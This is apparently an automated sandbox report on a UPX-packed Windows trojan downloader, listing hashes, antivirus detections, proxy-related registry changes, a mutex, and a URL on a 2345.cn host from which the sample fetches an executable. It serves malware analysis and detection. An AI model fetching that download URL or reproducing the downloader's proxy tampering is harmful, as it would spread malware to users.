Analysis Date: 2015-02-03 23:46:43
MD5: b66e733e0b632ab1c0e137a2def310ca
SHA1: 5bf12f0169241c5c7b8a8c877701fbdae3776dbc

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section UPX0: md5: d41d8cd98f00b204e9800998ecf8427e sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 size: 0
Section UPX1: md5: 62869d241869112fcfd866441aae4ed4 sha1: 9b833e221e4e9e7f59fa5df3c731f2f8462310d9 size: 26112
Section UPX2: md5: 374609d24c9729da8b0abbebd327118a sha1: a3de85f37000deac6254ede3b2ed9d8224180807 size: 512
Timestamp: 2014-06-01 05:12:10
Packer: UPX -> www.upx.sourceforge.net
PEhash: 9b8cbf1ceee05ae4c4a6cc9692a1c3521ecd45c6
IMPhash: aae523b64817f87cd3e70389d57336b0
AV 360 Safe: no_virus
AV Ad-Aware: Gen:Trojan.Heur.PT.bmGfbmH2SJc
AV Alwil (avast): Malware-gen:Win32:Malware-gen
AV Arcabit (arcavir): Gen:Trojan.Heur.PT.bmGfbmH2SJc
AV Authentium: W32/Downloader-Web-based!Maximu
AV Avira (antivir): no_virus
AV BullGuard: Gen:Trojan.Heur.PT.bmGfbmH2SJc
AV CA (E-Trust Ino): no_virus
AV CAT (quickheal): no_virus
AV ClamAV: no_virus
AV Dr. Web: Trojan.DownLoader11.18931
AV Emsisoft: Gen:Trojan.Heur.PT.bmGfbmH2SJc
AV Eset (nod32): Win32/TrojanDownloader.Agent.AHB
AV Fortinet: W32/Agent.AC!tr
AV Frisk (f-prot): W32/Downloader-Web-based!Maximu
AV F-Secure: Gen:Trojan.Heur.PT.bmGfbmH2SJc
AV Grisoft (avg): Downloader.Generic13.CFIZ
AV Ikarus: Backdoor.Win32.Androm
AV K7: Trojan ( 0040f8b51 )
AV Kaspersky: no_virus
AV MalwareBytes: no_virus
AV Mcafee: RDN/Generic Downloader.x!mn
AV Microsoft Security Essentials: no_virus
AV MicroWorld (escan): Gen:Trojan.Heur.PT.bmGfbmH2SJc
AV Rising: no_virus
AV Sophos: Mal/DownLdr-AC
AV Symantec: no_virus
AV Trend Micro: no_virus
AV VirusBlokAda (vba32): no_virus

Runtime Details:

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ NULL
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝ 1
Creates File: c:\2345pack.ini
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: \Device\Afd\AsyncConnectHlp
Creates Mutex: A9DB83DB_A9FD_11D0_BFD1_444553540000
Winsock DNS: jifendownload.2345.cn
Winsock URL: http://jifendownload.2345.cn/jifen_2345/p3_k70942462_jgAdzMQZ8XSp4yAskGpQJ_v14.6.1.exe

Network Details:

DNS: download.2345.com Type: A ➝ 61.160.245.14
DNS: download.2345.com Type: A ➝ 122.228.248.3
DNS: download.2345.com Type: A ➝ 218.75.155.244
DNS: download.2345.com Type: A ➝ 60.191.187.15
DNS: download.2345.com Type: A ➝ 60.191.223.2
DNS: download.2345.com Type: A ➝ 60.191.223.4
DNS: download.2345.com Type: A ➝ 60.191.223.15
DNS: download.2345.com Type: A ➝ 61.147.127.202
DNS: download.2345.com Type: A ➝ 61.147.127.203
DNS: download.2345.com Type: A ➝ 61.160.245.8
DNS: download.2345.com Type: A ➝ 61.160.245.11
DNS: jifendownload.2345.cn Type: A
HTTP GET: http://jifendownload.2345.cn/jifen_2345/p3_k70942462_jgAdzMQZ8XSp4yAskGpQJ_v14.6.1.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Flows TCP: 192.168.1.1:1032 ➝ 61.160.245.14:80

Raw Pcap


Strings